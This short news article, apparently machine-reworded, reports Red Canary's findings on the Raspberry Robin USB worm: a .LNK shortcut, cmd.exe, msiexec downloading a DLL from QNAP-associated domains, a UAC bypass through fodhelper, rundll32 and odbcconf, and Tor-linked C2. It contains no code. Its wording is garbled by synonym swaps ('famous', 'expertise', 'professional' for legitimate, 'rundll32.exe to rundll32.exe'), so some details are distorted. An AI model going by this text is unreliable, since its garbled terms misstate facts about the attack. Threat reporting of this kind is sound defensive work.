Cybersecurity researchers have found a brand new Windows malware with worm-like capabilities and is propagated via detachable USB gadgets.
Attributing the malware to a cluster named “Raspberry Robin,” Red Canary researchers famous that the worm “leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.”
The earliest indicators of the exercise are stated up to now again to September 2021, with infections noticed in organizations with ties to expertise and manufacturing sectors.
Attack chains pertaining to Raspberry Robin begin with connecting an contaminated USB drive to a Windows machine. Present throughout the machine is the worm payload, which seems as a .LNK shortcut file to a professional folder.
The worm then takes care of spawning a brand new course of utilizing cmd.exe to learn and execute a malicious file saved on the exterior drive.
This is adopted by launching explorer.exe and msiexec.exe, the latter of which is used for exterior community communication to a rogue area for command-and-control (C2) functions and to obtain and set up a DLL library file.
The malicious DLL is subsequently loaded and executed utilizing a sequence of professional Windows utilities corresponding to fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, successfully bypassing User Account Control (UAC).
Also widespread throughout Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses related to Tor nodes.
That stated, the operators’ targets stay unanswered at this stage. It’s additionally unclear how and the place the exterior drives are contaminated, though it is suspected that it is carried out offline.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers stated. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”